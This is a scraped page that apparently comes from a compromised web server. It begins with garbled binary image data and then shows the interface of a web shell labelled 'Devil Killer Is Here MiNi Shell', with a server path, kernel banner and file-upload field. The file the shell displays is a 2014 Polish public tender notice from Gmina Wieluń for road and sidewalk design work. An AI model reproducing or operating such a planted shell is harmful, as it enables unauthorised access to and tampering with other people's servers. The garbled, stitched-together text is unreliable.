JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140211/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140211/47668-N-2014.html

<p class="kh_header"><b>Wieluń: Opracowanie kompletnej dokumentacji projektowej dla zadań:
Remont chodnika - Wieluń, ul. Sadowa - Zadanie nr 1
Remont chodnika Wieluń, ul. Biedala - Zadanie nr 2
Remont ul. Ewangelickiej w Wieluniu - Zadanie nr 3
Remont ul. Fabrycznej - budowa ul. Fabrycznej w Wieluniu - Zadanie nr 4</b><br>
<b>Numer ogłoszenia: 47668 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wieluń , Plac Kazimierza Wielkiego 1, 98-300 Wieluń, woj. łódzkie, tel. 43 8860249, faks 43 8860260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompletnej dokumentacji projektowej dla zadań:
Remont chodnika - Wieluń, ul. Sadowa - Zadanie nr 1
Remont chodnika Wieluń, ul. Biedala - Zadanie nr 2
Remont ul. Ewangelickiej w Wieluniu - Zadanie nr 3
Remont ul. Fabrycznej - budowa ul. Fabrycznej w Wieluniu - Zadanie nr 4.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie kompletnej dokumentacji projektowej dla zadań:
Remont chodnika - Wieluń, ul. Sadowa - Zadanie Nr 1
Branża drogowa (remont istniejącego chodnika na długość około 340 m oraz budowa nowego chodnika na długości około 350 m)
Remont chodnika Wieluń, ul. Biedala - Zadanie Nr 2
Branża drogowa (długość około 145 m)
Remont ul. Ewangelickiej w Wieluniu - Zadanie Nr 3
Branża drogowa (długość około 220 m)
Remont ul. Fabrycznej - budowa ul. Fabrycznej w Wieluniu - Zadanie Nr 4
Branża drogowa: remont (długość około 400 m), budowa (długość około 350 m); kanalizacja deszczowa , (długość około 350 m); oświetlenie uliczne (długość około 350 m). Dla zadania nr 4 należy przewidzieć przeprowadzenie procedury w oparciu o ustawę o Szczególnych zasadach przygotowania i realizacji w zakresie dróg publicznych. Dla zadania nr 4 została ogłoszona informacja o możliwości umieszczenia w pasie drogowym kanału technologicznego, w związku z czym przy realizacji zadań może zajść konieczność zaprojektowania umieszczenia w pasie drogowym urządzeń, o których mowa w art. 39 ust. 6 ustawy o drogach publicznych.
Każda z ww. dokumentacji projektowych powinna uwzględniać obowiązujące normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi rozpoczęcie robót budowlanych. Dokumentacja powinna być opracowana zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) i przepisami wykonawczymi do ustawy.
Zakresy rzeczowe objęte projektami pokazano na schematach lokalizacyjnych projektowanych inwestycji, które stanowią załącznik nr 10 do niniejszej SIWZ.
Zamawiający udostępni w razie potrzeby wypis i wyrys z miejscowego planu zagospodarowania przestrzennego. 
3.4. Zakres rzeczowy usług:
Zakres rzeczowy każdej z wyżej wymienionych dokumentacji projektowych winien obejmować:
1) pozyskanie matrycy geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówienia w skali 1:500 w formie numerycznej zgodnie z rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25, poz. 133), wykonanie analogowo na folii i zapisanie na nośniku CD w formacie DXF. Matryca po wykonaniu zamówienia staje się własnością Zamawiającego;
2) wykonanie kompletnej dokumentacji projektowej uwzględniającej obowiązującej normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę, opracowanych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) i przepisami wykonawczymi, szczególnie rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2012 r., poz. 462) obejmującej:
- projekt budowlany - w ilości 5 egz.
- projekt wykonawczy - w ilości 5 egz.
- przedmiar robót - w ilości 2 egz.
- informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ) - w ilości 2 egz.
3) wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.;
4) wykonanie kosztorysu inwestorskiego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389) wydrukowanych w opcji kalkulacji uproszczonej z wyszczególnieniem cen jednostkowych dla każdej pozycji kosztorysowej - w ilości 2 egz.;
5) uzyskanie ostatecznego dokumentu upoważniającego do rozpoczęcia robót budowlanych oraz wszelkich decyzji i uzgodnień niezbędnych do jego uzyskania;
Całość dokumentacji projektowej jw. należy sporządzić również w wersji elektronicznej (PDF) i przekazać Zamawiającemu na nośniku (CD).
Wykonawca na etapie projektowania będzie zobowiązany dokonywać uzgodnień przyjętych rozwiązań projektowych z Zamawiającym. Wykonawca przedłoży wykonaną dokumentację projektową Zamawiającemu, który ustosunkuje się do niej w ciągu 21 dni od jej dostarczenia.  Aprobata Zamawiającego przedłożonej przez Wykonawcę dokumentacji nie zwalnia Wykonawcy z odpowiedzialności za prawidłowość opracowania dokumentacji projektowej i wykonania na jej podstawie robót budowlanych. 
Za wykonanie zamówienia uważa się przekazanie Zamawiającemu kompletnej dokumentacji projektowej oraz ostatecznego dokumentu uprawniającego Zamawiającego do rozpoczęcia robót budowlanych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 30 % wartości zamówienia podstawowego, ewentualne zamówienie uzupełniające zostanie udzielone w trybie przewidzianym w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, jeżeli zostaną spełnione przesłanki ustawowe</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium do dnia 20.02.2014 r. do godz. 13.00 w wysokości: 
Zadanie 1 - 163,00 zł (słownie: sto sześćdziesiąt trzy złote 00/100);
Zadanie 2 - 163,00 zł (słownie: sto sześćdziesiąt trzy złote 00/100);
Zadanie 3 - 325,00 zł (słownie: trzysta dwadzieścia pięć złotych 00/100);
Zadanie 4 - 805,00 zł (słownie: osiemset pięć złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania posiadania wiedzy i doświadczenia. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania dysponowania odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda udokumentowania dysponowania:
a) minimum jedną osobą posiadającą uprawnienia budowlane w zakresie projektowania bez ograniczeń w specjalności drogowej dla zadania nr 1, 2, 3, 4,
b) minimum jedną osobą posiadającą uprawnienia budowlane w zakresie projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci elektrycznych dla zadania nr 4,
b) minimum jedną osobą posiadającą uprawnienia budowlane w zakresie projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci kanalizacyjnych dla zadania nr 4.
Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie załącznika nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania sytuacji ekonomicznej i finansowej. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku polegania na osobach zdolnych do wykonania zamówienia pozostających w dyspozycji innego podmiotu, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, zgodnie z treścią załącznika nr 6 - Zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Brak dokumentu spowoduje wykluczenie Wykonawcy, a jego oferta zostanie uznana za odrzuconą.
W przypadku polegania przez Wykonawcę na zasobach innych podmiotów, biorących udział w realizacji zamówienia jako Podwykonawca, Zamawiający żąda od Wykonawcy załączenia do oferty w odniesieniu do tych podmiotów:
1) Oświadczenia o braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych z wykorzystaniem wzoru - załącznik nr 8 do SIWZ w formie oryginału sporządzonego i podpisanego przez podmiot zobowiązany;
2) aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez podmiot zobowiązany</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje się możliwość dokonania niżej wymienionych zmian: 
1) Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę. Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów w następujących przypadkach:
a) śmierci, choroby lub innych zdarzeń losowych kluczowego specjalisty,
b) niewywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy,
c) jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od Wykonawcy (np. rezygnacji);
2) Zamawiający może zażądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy lub wykonuje je nienależycie;
3) W przypadku zmiany kluczowego specjalisty, nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty;
4) Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego;
5) Zamawiający może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, który wyniknął z powodu:
a) nie uzyskania uzgodnień w terminach ustawowych, przy dołożeniu ze strony Wykonawcy maksymalnych starań w celu ich uzyskania, poświadczonych stosownymi dokumentami,
b) zmian dokumentacji projektowej, dokonanych na wniosek Zamawiającego,
c) siły wyższej;
6) Wykonawca nie będzie miał prawa do przedłużenia terminu wykonania umowy, jeżeli Zamawiający udowodni, że przedłużenie terminu wynika z przyczyn leżących po stronie Wykonawcy;
7) w przypadku uniemożliwienia rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu z przyczyn leżących po stronie Zamawiającego, termin wykonania prac ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia prac;
8) zmiana wynagrodzenia może nastąpić w przypadku ustawowej zmiany stawki podatku VAT;
9) wynagrodzenie może ulec zmniejszeniu w przypadku odstąpienia przez Zamawiającego od realizacji części przedmiotu umowy oraz w przypadku odstąpienia od umowy przez Strony.
2. Nie jest dopuszczalna zmiana Wykonawcy za wyjątkiem sukcesji generalnej, w tym dziedziczenia prawa w spółkach handlowych, przekształcenia, sukcesji z mocy prawa.
3. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 ustawy Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wieluniu, ul. Piłsudskiego 14, Biuro Zamówień Publicznych, pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2014 godzina 13:00, miejsce: Urząd Miejski w Wieluniu Wydział Organizacyjny (Plac Kazimierza Wlk.1 budynek ratusza) pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 21.03.2014.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont chodnika - Wieluń, ul. Sadowa - Zadanie Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Branża drogowa (remont istniejącego chodnika na długość około 340 m oraz budowa nowego chodnika na długości około 350 m).
Zakres rzeczowy dokumentacji projektowej winien obejmować:
1) pozyskanie matrycy geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówienia w skali 1:500 w formie numerycznej zgodnie z rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25, poz. 133), wykonanie analogowo na folii i zapisanie na nośniku CD w formacie DXF. Matryca po wykonaniu zamówienia staje się własnością Zamawiającego;
2) wykonanie kompletnej dokumentacji projektowej uwzględniającej obowiązującej normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę, opracowanych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) i przepisami wykonawczymi, szczególnie rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2012 r., poz. 462) obejmującej:
- projekt budowlany - w ilości 5 egz.
- projekt wykonawczy - w ilości 5 egz.
- przedmiar robót - w ilości 2 egz.
- informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ) - w ilości 2 egz.
